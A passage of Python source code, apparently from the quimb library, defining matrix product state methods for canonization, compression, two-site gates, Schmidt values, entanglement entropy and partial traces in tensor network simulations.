def canonize_cyclic(self, i, bra=None, method='isvd', inv_tol=1e-10):
"""Bring this MatrixProductState into (possibly only approximate)
canonical form at site(s) ``i``.
Parameters
----------
i : int or slice
The site or range of sites to make canonical.
bra : MatrixProductState, optional
Simultaneously canonize this state as well, assuming it to be the
co-vector.
method : {'isvd', 'svds', ...}, optional
How to perform the lateral compression.
inv_tol : float, optional
Tolerance with which to invert the gauge.
"""
if isinstance(i, Integral):
start, stop = i, i + 1
elif isinstance(i, slice):
start, stop = i.start, i.stop
else:
start, stop = min(i), max(i) + 1
if tuple(i) != tuple(range(start, stop)):
raise ValueError("Parameter ``i`` should be an integer or "
f"contiguous block of integers, got {i}.")
k = self.copy()
b = k.H
k.add_tag('_KET')
b.add_tag('_BRA')
kb = k & b
# approximate the rest of the chain with a separable transfer operator
kbc = kb.replace_section_with_svd(start, stop, eps=0.0, which='!any',
method=method, max_bond=1,
ltags='_LEFT', rtags='_RIGHT')
EL = kbc['_LEFT'].squeeze()
# explicitly symmetrize to hermitian
EL.modify(data=(EL.data + dag(EL.data)) / 2)
# split into upper 'ket' part and lower 'bra' part, symmetric
EL_lix, = EL.bonds(kbc[k.site_tag(start), '_BRA'])
_, x = EL.split(EL_lix, method='eigh', cutoff=-1, get='arrays')
ER = kbc['_RIGHT'].squeeze()
# explicitly symmetrize to hermitian
ER.modify(data=(ER.data + dag(ER.data)) / 2)
# split into upper 'ket' part and lower 'bra' part, symmetric
ER_lix, = ER.bonds(kbc[k.site_tag(stop - 1), '_BRA'])
_, y = ER.split(ER_lix, method='eigh', cutoff=-1, get='arrays')
self.insert_gauge(x, start - 1, start, tol=inv_tol)
self.insert_gauge(y, stop, stop - 1, tol=inv_tol)
if bra is not None:
for i in (start - 1, start, stop, stop - 1):
bra[i].modify(data=self[i].data.conj())
def shift_orthogonality_center(self, current, new, bra=None):
"""Move the orthogonality center of this MPS.
Parameters
----------
current : int
The current orthogonality center.
new : int
The target orthogonality center.
bra : MatrixProductState, optional
If supplied, simultaneously move the orthogonality center of this
MPS too, assuming it to be the conjugate state.
"""
if new > current:
for i in range(current, new):
self.left_canonize_site(i, bra=bra)
else:
for i in range(current, new, -1):
self.right_canonize_site(i, bra=bra)
def canonize(self, where, cur_orthog='calc', bra=None):
r"""Mixed canonize this TN. If this is a MPS, this implies that::
i i
>->->->->- ->-o-<- -<-<-<-<-< +-o-+
| | | | |...| | |...| | | | | -> | | |
>->->->->- ->-o-<- -<-<-<-<-< +-o-+
You can also supply a set of indices to orthogonalize around, and a
current location of the orthogonality center for efficiency::
current where
....... .....
>->->-c-c-c-c-<-<-<-<-<-< >->->->->->-w-w-w-<-<-<-<
| | | | | | | | | | | | | -> | | | | | | | | | | | | |
>->->-c-c-c-c-<-<-<-<-<-< >->->->->->-w-w-w-<-<-<-<
cmin cmax i j
This would only move ``cmin`` to ``i`` and ``cmax`` to ``j`` if
necessary.
Parameters
----------
where : int or sequence of int
Which site(s) to orthogonalize around. If a sequence of int then
make sure that section from min(where) to max(where) is orthog.
cur_orthog : int, sequence of int, or 'calc'
If given, the current site(s), so as to shift the orthogonality
ceneter as efficiently as possible. If 'calc', calculate the
current orthogonality center.
bra : MatrixProductState, optional
If supplied, simultaneously mixed canonize this MPS too, assuming
it to be the conjugate state.
"""
if isinstance(where, int):
i = j = where
else:
i, j = min(where), max(where)
if cur_orthog == 'calc':
cur_orthog = self.calc_current_orthog_center()
if cur_orthog is not None:
if isinstance(cur_orthog, int):
cmin = cmax = cur_orthog
else:
cmin, cmax = min(cur_orthog), max(cur_orthog)
if cmax > j:
self.shift_orthogonality_center(cmax, j, bra=bra)
if cmin < i:
self.shift_orthogonality_center(cmin, i, bra=bra)
else:
self.left_canonize(i, bra=bra)
self.right_canonize(j, bra=bra)
return self
def left_compress_site(self, i, bra=None, **compress_opts):
"""Left compress this 1D TN's ith site, such that the site is then
left unitary with its right bond (possibly) reduced in dimension.
Parameters
----------
i : int
Which site to compress.
bra : None or matching TensorNetwork to self, optional
If set, also update this TN's data with the conjugate compression.
compress_opts
Supplied to :meth:`Tensor.split`.
"""
compress_opts.setdefault('absorb', 'right')
self._left_decomp_site(i, bra=bra, **compress_opts)
def right_compress_site(self, i, bra=None, **compress_opts):
"""Right compress this 1D TN's ith site, such that the site is then
right unitary with its left bond (possibly) reduced in dimension.
Parameters
----------
i : int
Which site to compress.
bra : None or matching TensorNetwork to self, optional
If set, update this TN's data with the conjugate compression.
compress_opts
Supplied to :meth:`Tensor.split`.
"""
compress_opts.setdefault('absorb', 'left')
self._right_decomp_site(i, bra=bra, **compress_opts)
def left_compress(self, start=None, stop=None, bra=None, **compress_opts):
"""Compress this 1D TN, from left to right, such that it becomes
left-canonical (unless ``absorb != 'right'``).
Parameters
----------
start : int, optional
Site to begin compressing on.
stop : int, optional
Site to stop compressing at (won't itself be an isometry).
bra : None or TensorNetwork like this one, optional
If given, update this TN as well, assuming it to be the conjugate.
compress_opts
Supplied to :meth:`Tensor.split`.
"""
if start is None:
start = -1 if self.cyclic else 0
if stop is None:
stop = self.L - 1
for i in range(start, stop):
self.left_compress_site(i, bra=bra, **compress_opts)
def right_compress(self, start=None, stop=None, bra=None, **compress_opts):
"""Compress this 1D TN, from right to left, such that it becomes
right-canonical (unless ``absorb != 'left'``).
Parameters
----------
start : int, optional
Site to begin compressing on.
stop : int, optional
Site to stop compressing at (won't itself be an isometry).
bra : None or TensorNetwork like this one, optional
If given, update this TN as well, assuming it to be the conjugate.
compress_opts
Supplied to :meth:`Tensor.split`.
"""
if start is None:
start = self.L - (0 if self.cyclic else 1)
if stop is None:
stop = 0
for i in range(start, stop, -1):
self.right_compress_site(i, bra=bra, **compress_opts)
def compress(self, form=None, **compress_opts):
"""Compress this 1D Tensor Network, possibly into canonical form.
Parameters
----------
form : {None, 'flat', 'left', 'right'} or int
Output form of the TN. ``None`` left canonizes the state first for
stability reasons, then right_compresses (default). ``'flat'``
tries to distribute the singular values evenly -- state will not
be canonical. ``'left'`` and ``'right'`` put the state into left
and right canonical form respectively with a prior opposite sweep,
or an int will put the state into mixed canonical form at that
site.
compress_opts
Supplied to :meth:`Tensor.split`.
"""
if form is None:
form = 'right'
if isinstance(form, Integral):
self.right_canonize()
self.left_compress(**compress_opts)
self.right_canonize(stop=form)
elif form == 'left':
self.right_canonize(bra=compress_opts.get('bra', None))
self.left_compress(**compress_opts)
elif form == 'right':
self.left_canonize(bra=compress_opts.get('bra', None))
self.right_compress(**compress_opts)
elif form == 'flat':
compress_opts['absorb'] = 'both'
self.right_compress(stop=self.L // 2, **compress_opts)
self.left_compress(stop=self.L // 2, **compress_opts)
else:
raise ValueError(f"Form specifier {form} not understood, should be"
" either 'left', 'right', 'flat' or an int "
"specifiying a new orthog center.")
def compress_site(self, i, canonize=True, cur_orthog='calc', bra=None,
**compress_opts):
r"""Compress the bonds adjacent to site ``i``, by default first setting
the orthogonality center to that site::
i i
-o-o-o-o-o- --> ->->~o~<-<-
| | | | | | | | | |
Parameters
----------
i : int
Which site to compress around
canonize : bool, optional
Whether to first set the orthogonality center to site ``i``.
cur_orthog : int, optional
If given, the known current orthogonality center, to speed up the
mixed canonization.
bra : MatrixProductState, optional
The conjugate state to also apply the compression to.
compress_opts
Supplied to :func:`~quimb.tensor.tensor_core.tensor_split`.
"""
if canonize:
self.canonize(i, cur_orthog=cur_orthog, bra=bra)
if self.cyclic or i > 0:
self.left_compress_site(i - 1, bra=bra, **compress_opts)
if self.cyclic or i < self.L - 1:
self.right_compress_site(i + 1, bra=bra, **compress_opts)
def bond(self, i, j):
"""Get the name of the index defining the bond between sites i and j.
"""
bond, = self[i].bonds(self[j])
return bond
def bond_size(self, i, j):
"""Return the size of the bond between site ``i`` and ``j``.
"""
b_ix = self.bond(i, j)
return self[i].ind_size(b_ix)
def bond_sizes(self):
bnd_szs = [self.bond_size(i, i + 1) for i in range(self.L - 1)]
if self.cyclic:
bnd_szs.append(self.bond_size(-1, 0))
return bnd_szs
def singular_values(self, i, cur_orthog=None, method='svd'):
r"""Find the singular values associated with the ith bond::
....L.... i
o-o-o-o-o-l-o-o-o-o-o-o-o-o-o-o-o
| | | | | | | | | | | | | | | |
i-1 ..........R..........
Leaves the 1D TN in mixed canoncial form at bond ``i``.
Parameters
----------
i : int
Which bond, or equivalently, the number of sites in the
left partition.
cur_orthog : int
If given, the known current orthogonality center, to speed up the
mixed canonization, e.g. if sweeping this function from left to
right would use ``i - 1``.
Returns
-------
svals : 1d-array
The singular values.
"""
if not (0 < i < self.L):
raise ValueError(f"Need 0 < i < {self.L}, got i={i}.")
self.canonize(i, cur_orthog)
Tm1 = self[i]
left_inds = Tm1.bonds(self[i - 1])
return Tm1.singular_values(left_inds, method=method)
def expand_bond_dimension(
self,
new_bond_dim,
rand_strength=0.0,
bra=None,
inplace=True,
):
"""Expand the bond dimensions of this 1D tensor network to at least
``new_bond_dim``.
Parameters
----------
new_bond_dim : int
Minimum bond dimension to expand to.
inplace : bool, optional
Whether to perform the expansion in place.
bra : MatrixProductState, optional
Mirror the changes to ``bra`` inplace, treating it as the conjugate
state.
rand_strength : float, optional
If ``rand_strength > 0``, fill the new tensor entries with gaussian
noise of strength ``rand_strength``.
Returns
-------
MatrixProductState
"""
tn = super().expand_bond_dimension(
new_bond_dim=new_bond_dim,
rand_strength=rand_strength,
inplace=inplace,
)
if bra is not None:
for coo in tn.gen_site_coos():
bra[coo].modify(data=tn[coo].data.conj())
return tn
def count_canonized(self):
if self.cyclic:
return 0, 0
ov = self.H & self
num_can_l = 0
num_can_r = 0
def isidentity(x):
d = x.shape[0]
if get_dtype_name(x) in ('float32', 'complex64'):
rtol, atol = 1e-5, 1e-6
else:
rtol, atol = 1e-9, 1e-11
idtty = do('eye', d, dtype=x.dtype, like=x)
return do('allclose', x, idtty, rtol=rtol, atol=atol)
for i in range(self.L - 1):
ov ^= slice(max(0, i - 1), i + 1)
x = ov[i].data
if isidentity(x):
num_can_l += 1
else:
break
for j in reversed(range(i + 1, self.L)):
ov ^= slice(j, min(self.L, j + 2))
x = ov[j].data
if isidentity(x):
num_can_r += 1
else:
break
return num_can_l, num_can_r
def calc_current_orthog_center(self):
"""Calculate the site(s) of the current orthogonality center.
Returns
-------
int or (int, int)
The site, or min/max, around which this MPS is orthogonal.
"""
lo, ro = self.count_canonized()
i, j = lo, self.L - ro - 1
return i if i == j else i, j
def as_cyclic(self, inplace=False):
"""Convert this flat, 1D, TN into cyclic form by adding a dummy bond
between the first and last sites.
"""
tn = self if inplace else self.copy()
# nothing to do
if tn.cyclic:
return tn
tn.new_bond(0, -1)
tn.cyclic = True
return tn
def show(self, max_width=None):
l1 = ""
l2 = ""
l3 = ""
num_can_l, num_can_r = self.count_canonized()
for i in range(self.L - 1):
bdim = self.bond_size(i, i + 1)
strl = len(str(bdim))
l1 += f" {bdim}"
l2 += (">" if i < num_can_l else
"<" if i >= self.L - num_can_r else
"●") + ("─" if bdim < 100 else "━") * strl
l3 += "│" + " " * strl
strl = len(str(bdim))
l1 += " "
l2 += "<" if num_can_r > 0 else "●"
l3 += "│"
if self.cyclic:
bdim = self.bond_size(0, self.L - 1)
bnd_str = ("─" if bdim < 100 else "━") * strl
l1 = f" {bdim}{l1}{bdim} "
l2 = f"+{bnd_str}{l2}{bnd_str}+"
l3 = f" {' ' * strl}{l3}{' ' * strl} "
print_multi_line(l1, l2, l3, max_width=max_width)
class MatrixProductState(TensorNetwork1DVector,
TensorNetwork1DFlat,
TensorNetwork1D,
TensorNetwork):
"""Initialise a matrix product state, with auto labelling and tagging.
Parameters
----------
arrays : sequence of arrays
The tensor arrays to form into a MPS.
shape : str, optional
String specifying layout of the tensors. E.g. 'lrp' (the default)
indicates the shape corresponds left-bond, right-bond, physical index.
End tensors have either 'l' or 'r' dropped from the string.
site_ind_id : str
A string specifiying how to label the physical site indices. Should
contain a ``'{}'`` placeholder. It is used to generate the actual
indices like: ``map(site_ind_id.format, range(len(arrays)))``.
site_tag_id : str
A string specifiying how to tag the tensors at each site. Should
contain a ``'{}'`` placeholder. It is used to generate the actual tags
like: ``map(site_tag_id.format, range(len(arrays)))``.
tags : str or sequence of str, optional
Global tags to attach to all tensors.
bond_name : str, optional
The base name of the bond indices, onto which uuids will be added.
"""
_EXTRA_PROPS = (
'_site_tag_id',
'_site_ind_id',
'cyclic',
'_L',
)
def __init__(self, arrays, *, shape='lrp', tags=None, bond_name="",
site_ind_id='k{}', site_tag_id='I{}', **tn_opts):
# short-circuit for copying MPSs
if isinstance(arrays, MatrixProductState):
super().__init__(arrays)
return
arrays = tuple(arrays)
self._L = len(arrays)
# process site indices
self._site_ind_id = site_ind_id
site_inds = map(site_ind_id.format, range(self.L))
# process site tags
self._site_tag_id = site_tag_id
site_tags = map(site_tag_id.format, range(self.L))
if tags is not None:
# mix in global tags
tags = tags_to_oset(tags)
site_tags = (tags | oset((st,)) for st in site_tags)
self.cyclic = (ops.ndim(arrays[0]) == 3)
# transpose arrays to 'lrp' order.
def gen_orders():
lp_ord = tuple(shape.replace('r', "").find(x) for x in 'lp')
lrp_ord = tuple(shape.find(x) for x in 'lrp')
rp_ord = tuple(shape.replace('l', "").find(x) for x in 'rp')
yield lp_ord if not self.cyclic else lrp_ord
for _ in range(self.L - 2):
yield lrp_ord
yield rp_ord if not self.cyclic else lrp_ord
def gen_inds():
cyc_bond = (rand_uuid(base=bond_name),) if self.cyclic else ()
nbond = rand_uuid(base=bond_name)
yield cyc_bond + (nbond, next(site_inds))
pbond = nbond
for _ in range(self.L - 2):
nbond = rand_uuid(base=bond_name)
yield (pbond, nbond, next(site_inds))
pbond = nbond
yield (pbond,) + cyc_bond + (next(site_inds),)
def gen_tensors():
for array, site_tag, inds, order in zip(arrays, site_tags,
gen_inds(), gen_orders()):
yield Tensor(transpose(array, order), inds=inds, tags=site_tag)
super().__init__(gen_tensors(), virtual=True, **tn_opts)
@classmethod
def from_dense(cls, psi, dims, site_ind_id='k{}',
site_tag_id='I{}', **split_opts):
"""Create a ``MatrixProductState`` directly from a dense vector
Parameters
----------
psi : array_like
The dense state to convert to MPS from.
dims : sequence of int
Physical subsystem dimensions of each site.
site_ind_id : str, optional
How to index the physical sites, see
:class:`~quimb.tensor.tensor_1d.MatrixProductState`.
site_tag_id : str, optional
How to tag the physical sites, see
:class:`~quimb.tensor.tensor_1d.MatrixProductState`.
split_opts
Supplied to :func:`~quimb.tensor.tensor_core.tensor_split` to
in order to partition the dense vector into tensors.
Returns
-------
MatrixProductState
Examples
--------
>>> dims = [2, 2, 2, 2, 2, 2]
>>> psi = rand_ket(prod(dims))
>>> mps = MatrixProductState.from_dense(psi, dims)
>>> mps.show()
2 4 8 4 2
o-o-o-o-o-o
| | | | | |
"""
set_default_compress_mode(split_opts)
L = len(dims)
inds = [site_ind_id.format(i) for i in range(L)]
T = Tensor(reshape(ops.asarray(psi), dims), inds=inds)
def gen_tensors():
# split
# <-- : yield
# : :
# OOOOOOO--O-O-O
# ||||||| | | |
# .......
# left_inds
TM = T
for i in range(L - 1, 0, -1):
TM, TR = TM.split(left_inds=inds[:i], get='tensors',
rtags=site_tag_id.format(i), **split_opts)
yield TR
TM.add_tag(site_tag_id.format(0))
yield TM
tn = TensorNetwork(gen_tensors())
return cls.from_TN(tn, cyclic=False, L=L,
site_ind_id=site_ind_id,
site_tag_id=site_tag_id)
def add_MPS(self, other, inplace=False, compress=False, **compress_opts):
"""Add another MatrixProductState to this one.
"""
if self.L != other.L:
raise ValueError("Can't add MPS with another of different length.")
new_mps = self if inplace else self.copy()
for i in new_mps.gen_site_coos():
t1, t2 = new_mps[i], other[i]
if set(t1.inds) != set(t2.inds):
# Need to use bonds to match indices
reindex_map = {}
if i > 0 or self.cyclic:
pair = ((i - 1) % self.L, i)
reindex_map[other.bond(*pair)] = new_mps.bond(*pair)
if i < new_mps.L - 1 or self.cyclic:
pair = (i, (i + 1) % self.L)
reindex_map[other.bond(*pair)] = new_mps.bond(*pair)
t2 = t2.reindex(reindex_map)
t1.direct_product_(t2, sum_inds=new_mps.site_ind(i))
if compress:
new_mps.compress(**compress_opts)
return new_mps
add_MPS_ = functools.partialmethod(add_MPS, inplace=True)
def permute_arrays(self, shape='lrp'):
"""Permute the indices of each tensor in this MPS to match ``shape``.
This doesn't change how the overall object interacts with other tensor
networks but may be useful for extracting the underlying arrays
consistently. This is an inplace operation.
Parameters
----------
shape : str, optional
A permutation of ``'lrp'`` specifying the desired order of the
left, right, and physical indices respectively.
"""
for i in self.sites:
inds = {'p': self.site_ind(i)}
if self.cyclic or i > 0:
inds['l'] = self.bond(i, (i - 1) % self.L)
if self.cyclic or i < self.L - 1:
inds['r'] = self.bond(i, (i + 1) % self.L)
inds = [inds[s] for s in shape if s in inds]
self[i].transpose_(*inds)
def __add__(self, other):
"""MPS addition.
"""
return self.add_MPS(other, inplace=False)
def __iadd__(self, other):
"""In-place MPS addition.
"""
return self.add_MPS(other, inplace=True)
def __sub__(self, other):
"""MPS subtraction.
"""
return self.add_MPS(other * -1, inplace=False)
def __isub__(self, other):
"""In-place MPS subtraction.
"""
return self.add_MPS(other * -1, inplace=True)
def normalize(self, bra=None, eps=1e-15, insert=None):
"""Normalize this MPS, optional with co-vector ``bra``. For periodic
MPS this uses transfer matrix SVD approximation with precision ``eps``
in order to be efficient. Inplace.
Parameters
----------
bra : MatrixProductState, optional
If given, normalize this MPS with the same factor.
eps : float, optional
If cyclic, precision to approximation transfer matrix with.
Default: 1e-14.
insert : int, optional
Insert the corrective normalization on this site, random if
not given.
Returns
-------
old_norm : float
The old norm ``self.H @ self``.
"""
norm = expec_TN_1D(self.H, self, eps=eps)
if insert is None:
insert = -1
self[insert].modify(data=self[insert].data / norm ** 0.5)
if bra is not None:
bra[insert].modify(data=bra[insert].data / norm ** 0.5)
return norm
def gate_split(self, G, where, inplace=False, **compress_opts):
r"""Apply a two-site gate and then split resulting tensor to retrieve a
MPS form::
-o-o-A-B-o-o-
| | | | | | -o-o-GGG-o-o- -o-o-X~Y-o-o-
| | GGG | | ==> | | | | | | ==> | | | | | |
| | | | | | i j i j
i j
As might be found in TEBD.
Parameters
----------
G : array
The gate, with shape ``(d**2, d**2)`` for physical dimension ``d``.
where : (int, int)
Indices of the sites to apply the gate to.
compress_opts
Supplied to :func:`~quimb.tensor.tensor_split`.
See Also
--------
gate, gate_with_auto_swap
"""
tn = self if inplace else self.copy()
i, j = where
Ti, Tj = tn[i], tn[j]
ix_i, ix_j = tn.site_ind(i), tn.site_ind(j)
# Make Tensor of gate
d = tn.phys_dim(i)
TG = Tensor(reshape(ops.asarray(G), (d, d, d, d)),
inds=("_tmpi", "_tmpj", ix_i, ix_j))
# Contract gate into the two sites
TG = TG.contract(Ti, Tj)
TG.reindex_({"_tmpi": ix_i, "_tmpj": ix_j})
# Split the tensor
_, left_ix = Ti.filter_bonds(Tj)
set_default_compress_mode(compress_opts, self.cyclic)
nTi, nTj = TG.split(left_inds=left_ix, get='tensors', **compress_opts)
# make sure the new data shape matches and reinsert
Ti.modify(data=nTi.transpose_like_(Ti).data)
Tj.modify(data=nTj.transpose_like_(Tj).data)
return tn
gate_split_ = functools.partialmethod(gate_split, inplace=True)
def swap_sites_with_compress(self, i, j, cur_orthog=None,
inplace=False, **compress_opts):
"""Swap sites ``i`` and ``j`` by contracting, then splitting with the
physical indices swapped.
Parameters
----------
i : int
The first site to swap.
j : int
The second site to swap.
cur_orthog : int, sequence of int, or 'calc'
If known, the current orthogonality center.
inplace : bond, optional
Perform the swaps inplace.
compress_opts
Supplied to :func:`~quimb.tensor.tensor_core.tensor_split`.
"""
i, j = sorted((i, j))
if i + 1 != j:
raise ValueError("Sites aren't adjacent.")
mps = self if inplace else self.copy()
mps.canonize((i, j), cur_orthog)
# get site tensors and indices
ix_i, ix_j = map(mps.site_ind, (i, j))
Ti, Tj = mps[i], mps[j]
_, unshared = Ti.filter_bonds(Tj)
# split the contracted tensor, swapping the site indices
Tij = Ti @ Tj
lix = [i for i in unshared if i != ix_i] + [ix_j]
set_default_compress_mode(compress_opts, self.cyclic)
sTi, sTj = Tij.split(lix, get='tensors', **compress_opts)
# reindex and transpose the tensors to directly update original tensors
sTi.reindex_({ix_j: ix_i})
sTj.reindex_({ix_i: ix_j})
sTi.transpose_like_(Ti)
sTj.transpose_like_(Tj)
Ti.modify(data=sTi.data)
Tj.modify(data=sTj.data)
return mps
def swap_site_to(self, i, f, cur_orthog=None,
inplace=False, **compress_opts):
r"""Swap site ``i`` to site ``f``, compressing the bond after each
swap::
i f
0 1 2 3 4 5 6 7 8 9 0 1 2 4 5 6 7 3 8 9
o-o-o-x-o-o-o-o-o-o o-o-o-o-o-o-o-x-o-o
| | | | | | | | | | -> | | | | | | | | | |
Parameters
----------
i : int
The site to move.
f : int
The new location for site ``i``.
cur_orthog : int, sequence of int, or 'calc'
If known, the current orthogonality center.
inplace : bond, optional
Perform the swaps inplace.
compress_opts
Supplied to :func:`~quimb.tensor.tensor_core.tensor_split`.
"""
mps = self if inplace else self.copy()
if i == f:
return mps
if i < f:
js = range(i, f)
if f < i:
js = range(i - 1, f - 1, -1)
for j in js:
mps.swap_sites_with_compress(
j, j + 1, inplace=True, cur_orthog=cur_orthog, **compress_opts)
cur_orthog = (j, j + 1)
return mps
def gate_with_auto_swap(self, G, where, inplace=False,
cur_orthog=None, **compress_opts):
"""Perform a two site gate on this MPS by, if necessary, swapping and
compressing the sites until they are adjacent, using ``gate_split``,
then unswapping the sites back to their original position.
Parameters
----------
G : array
The gate, with shape ``(d**2, d**2)`` for physical dimension ``d``.
where : (int, int)
Indices of the sites to apply the gate to.
cur_orthog : int, sequence of int, or 'calc'
If known, the current orthogonality center.
inplace : bond, optional
Perform the swaps inplace.
compress_opts
Supplied to :func:`~quimb.tensor.tensor_core.tensor_split`.
See Also
--------
gate, gate_split
"""
mps = self if inplace else self.copy()
i, j = sorted(where)
need2swap = i + 1 != j
# move j site adjacent to i site
if need2swap:
mps.swap_site_to(j, i + 1, cur_orthog=cur_orthog,
inplace=True, **compress_opts)
cur_orthog = (i + 1, i + 2)
# make sure sites are orthog center, then apply and split
mps.canonize((i, i + 1), cur_orthog)
mps.gate_split_(G, (i, i + 1), **compress_opts)
# move j site back to original position
if need2swap:
mps.swap_site_to(i + 1, j, cur_orthog=(i, i + 1),
inplace=True, **compress_opts, )
return mps
def magnetization(self, i, direction='Z', cur_orthog=None):
"""Compute the magnetization at site ``i``.
"""
if self.cyclic:
msg = ("``magnetization`` currently makes use of orthogonality for"
" efficiencies sake, for cyclic systems is it still "
"possible to compute as a normal expectation.")
raise NotImplementedError(msg)
self.canonize(i, cur_orthog)
# +-k-+
# | O |
# +-b-+
Tk = self[i]
ind1, ind2 = self.site_ind(i), '__tmp__'
Tb = Tk.H.reindex({ind1: ind2})
O_data = qu.spin_operator(direction, S=(self.phys_dim(i) - 1) / 2)
TO = Tensor(O_data, inds=(ind1, ind2))
return Tk.contract(TO, Tb)
def schmidt_values(self, i, cur_orthog=None, method='svd'):
r"""Find the schmidt values associated with the bipartition of this
MPS between sites on either site of ``i``. In other words, ``i`` is the
number of sites in the left hand partition::
....L.... i
o-o-o-o-o-S-o-o-o-o-o-o-o-o-o-o-o
| | | | | | | | | | | | | | | |
i-1 ..........R..........
The schmidt values, ``S``, are the singular values associated with the
``(i - 1, i)`` bond, squared, provided the MPS is mixed canonized at
one of those sites.
Parameters
----------
i : int
The number of sites in the left partition.
cur_orthog : int
If given, the known current orthogonality center, to speed up the
mixed canonization.
Returns
-------
S : 1d-array
The schmidt values.
"""
if self.cyclic:
raise NotImplementedError
return self.singular_values(i, cur_orthog, method=method)**2
def entropy(self, i, cur_orthog=None, method='svd'):
"""The entropy of bipartition between the left block of ``i`` sites and
the rest.
Parameters
----------
i : int
The number of sites in the left partition.
cur_orthog : int
If given, the known current orthogonality center, to speed up the
mixed canonization.
Returns
-------
float
"""
if self.cyclic:
msg = ("For cyclic systems, try explicitly computing the entropy "
"of the (compressed) reduced density matrix.")
raise NotImplementedError(msg)
S = self.schmidt_values(i, cur_orthog=cur_orthog, method=method)
S = S[S > 0.0]
return do('sum', -S * do('log2', S))
def schmidt_gap(self, i, cur_orthog=None, method='svd'):
"""The schmidt gap of bipartition between the left block of ``i`` sites
and the rest.
Parameters
----------
i : int
The number of sites in the left partition.
cur_orthog : int
If given, the known current orthogonality center, to speed up the
mixed canonization.
Returns
-------
float
"""
if self.cyclic:
raise NotImplementedError
S = self.schmidt_values(i, cur_orthog=cur_orthog, method=method)
if len(S) == 1:
return S[0]
return S[0] - S[1]
def partial_trace(self, keep, upper_ind_id="b{}", rescale_sites=True):
r"""Partially trace this matrix product state, producing a matrix
product operator.
Parameters
----------
keep : sequence of int or slice
Indicies of the sites to keep.
upper_ind_id : str, optional
The ind id of the (new) 'upper' inds, i.e. the 'bra' inds.
rescale_sites : bool, optional
If ``True`` (the default), then the kept sites will be rescaled to
``(0, 1, 2, ...)`` etc. rather than keeping their original site
numbers.
Returns
-------
rho : MatrixProductOperator
The density operator in MPO form.
"""
p_bra = self.copy()
p_bra.reindex_sites_(upper_ind_id, where=keep)
rho = self.H & p_bra
# now have e.g:
# | | | |
# o-o-o-o-o-o-o-o-o
# | | | | |
# o-o-o-o-o-o-o-o-o
# | | | |
if isinstance(keep, slice):
keep = self.slice2sites(keep)
keep = sorted(keep)
for i in self.gen_site_coos():
if i in keep:
# |
# -o- |
# ... -o- ... -> ... -O- ...
# i| i|
rho ^= self.site_tag(i)
else:
# |
# -o-o- |
# ... | ... -> ... -OO- ...
# -o-o- |i+1
# i |i+1
if i < self.L - 1:
rho >>= [self.site_tag(i), self.site_tag(i + 1)]
else:
rho >>= [self.site_tag(i), self.site_tag(max(keep))]
rho.drop_tags(self.site_tag(i))
# if single site a single tensor is produced
if isinstance(rho, Tensor):
rho = TensorNetwork([rho])
if rescale_sites:
# e.g. [3, 4, 5, 7, 9] -> [0, 1, 2, 3, 4]
retag, reind = {}, {}
for new, old in enumerate(keep):
retag[self.site_tag(old)] = self.site_tag(new)
reind[self.site_ind(old)] = self.site_ind(new)
reind[upper_ind_id.format(old)] = upper_ind_id.format(new)
rho.retag_(retag)
rho.reindex_(reind)
L = len(keep)
else:
L = self.L
# transpose upper and lower tags to match other MPOs
rho.view_as_(
MatrixProductOperator,
cyclic=self.cyclic, L=L, site_tag_id=self.site_tag_id,
lower_ind_id=upper_ind_id, upper_ind_id=self.site_ind_id, )
rho.fuse_multibonds(inplace=True)
return rho
def ptr(self, keep, upper_ind_id="b{}", rescale_sites=True):
"""Alias of :meth:`~quimb.tensor.MatrixProductState.partial_trace`.
"""
return self.partial_trace(keep, upper_ind_id,
rescale_sites=rescale_sites)
def bipartite_schmidt_state(self, sz_a, get='ket', cur_orthog=None):
r"""Compute the reduced state for a bipartition of an OBC MPS, in terms
of the minimal left/right schmidt basis::
A B
......... ...........
>->->->->--s--<-<-<-<-<-< -> +-s-+
| | | | | | | | | | | | |
k0 k1... kA kB
Parameters
----------
sz_a : int
The number of sites in subsystem A, must be ``0 < sz_a < N``.
get : {'ket', 'rho', 'ket-dense', 'rho-dense'}, optional
Get the:
- 'ket': vector form as tensor.
- 'rho': density operator form, i.e. vector outer product
- 'ket-dense': like 'ket' but return ``qarray``.
- 'rho-dense': like 'rho' but return ``qarray``.
cur_orthog : int, optional
If given, take as the current orthogonality center so as to
efficienctly move it a minimal distance.
"""
if self.cyclic:
raise NotImplementedError("MPS must have OBC.")
s = do('diag', self.singular_values(sz_a, cur_orthog=cur_orthog))
if 'dense' in get:
kd = qu.qarray(s.reshape(-1, 1))
if 'ket' in get:
return kd
elif 'rho' in get:
return kd @ kd.H
else:
k = Tensor(s, (self.site_ind('A'), self.site_ind('B')))
if 'ket' in get:
return k
elif 'rho' in get:
return k & k.reindex({'kA': 'bA', 'kB': 'bB'})
@staticmethod
def _do_lateral_compress(mps, kb, section, leave_short, ul, ll, heps,
hmethod, hmax_bond, verbosity, compressed,
**compress_opts):
# section
# ul -o-o-o-o-o-o-o-o-o- ul -\ /-
# | | | | | | | | | ==> 0~~~~~0
# ll -o-o-o-o-o-o-o-o-o- ll -/ : \-
# hmax_bond
if leave_short:
# if section is short doesn't make sense to lateral compress
# work out roughly when this occurs by comparing bond size
left_sz = mps.bond_size(section[0] - 1, section[0])
right_sz = mps.bond_size(section[-1], section[-1] + 1)
if mps.phys_dim() ** len(section) <= left_sz * right_sz:
if verbosity >= 1:
print(f"Leaving lateral compress of section '{section}' as"
f" it is too short: length={len(section)}, eff "
f"size={left_sz * right_sz}.")
return
if verbosity >= 1:
print(f"Laterally compressing section {section}. Using options: "
f"eps={heps}, method={hmethod}, max_bond={hmax_bond}")
section_tags = map(mps.site_tag, section)
kb.replace_with_svd(section_tags, (ul, ll), heps, inplace=True,
ltags='_LEFT', rtags='_RIGHT', method=hmethod,
max_bond=hmax_bond, **compress_opts)
compressed.append(section)
@staticmethod
def _do_vertical_decomp(mps, kb, section, sysa, sysb, compressed, ul, ur,
ll, lr, vmethod, vmax_bond, veps, verbosity,
**compress_opts):
if section == sysa:
label = 'A'
elif section == sysb:
label = 'B'
else:
return
section_tags = [mps.site_tag(i) for i in section]
if section in compressed:
# ----U---- | <- vmax_bond
# -\ /- / ----U----
# L~~~~R ==> \ ==>
# -/ \- / ----D----
# ----D---- | <- vmax_bond
# try and choose a sensible method
if vmethod is None:
left_sz = mps.bond_size(section[0] - 1, section[0])
right_sz = mps.bond_size(section[-1], section[-1] + 1)
if left_sz * right_sz <= 2**13:
# cholesky is not rank revealing
vmethod = 'eigh' if vmax_bond else 'cholesky'
else:
vmethod = 'isvd'
if verbosity >= 1:
print(f"Performing vertical decomposition of section {label}, "
